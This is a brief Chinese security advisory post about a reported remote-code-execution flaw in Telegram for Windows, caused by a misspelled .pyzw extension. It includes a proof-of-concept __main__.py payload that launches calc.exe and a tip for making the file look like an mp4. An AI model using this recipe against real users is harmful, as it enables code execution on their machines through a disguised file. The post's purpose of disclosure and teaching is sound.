N/A|0day!Telegram Windows客户端存在RCE漏洞
N/A|0day!Telegram Windows客户端存在RCE漏洞
alicy 信安百科 2024-04-13 08:30
0x00 前言
Telegram是一款跨平台的即时通讯软件,用户可以相互交换加密与自毁消息,发送照片、影片等所有类型文件。
0x01 漏洞描述
官方源文件中写错文件后缀名,
pyzw写成了pywz
,攻击者制作恶意的
.pyzw文件可以在windows中执行任意代码。
.pyzw是python zip应用程序(zipapp)的文件扩展名。
0x02 漏洞利用限制条件
1、windows环境
2、安装有python
0x03 漏洞详情
pyzw 本质上就是一个zip文件,内附一个__main__.py 打包成zip,并修改为pyzw后缀名,运行文件就会去执行__main__.py里对应的Python代码。
写法一:
__import__("subprocess").call(["calc.exe"])
写法二:
import subprocess
subprocess.run("calc.exe")
因为漏洞可以结合机器人进行转发,可以使文件变为mp4格式。
0x04 参考链接
安全科普|0day?网传Telegram桌面版存在RCE漏洞
推荐阅读:
CVE-2024-3400|Palo Alto Networks PAN-OS 命令注入漏洞
CVE-2024-3273|D-Link NAS设备存在后门帐户(POC)
CVE-2024-29202|JumpServer JINJA2注入代码执行漏洞(POC)
Ps:国内外安全热点分享,欢迎大家分享、转载,请保证文章的完整性。文章中出现敏感信息和侵权内容,请联系作者删除信息。信息安全任重道远,感谢您的支持
!!!
本公众号的文章及工具仅提供学习参考,由于传播、利用此文档提供的信息而造成任何直接或间接的后果及损害,均由使用者本人负责,本公众号及文章作者不为此承担任何责任。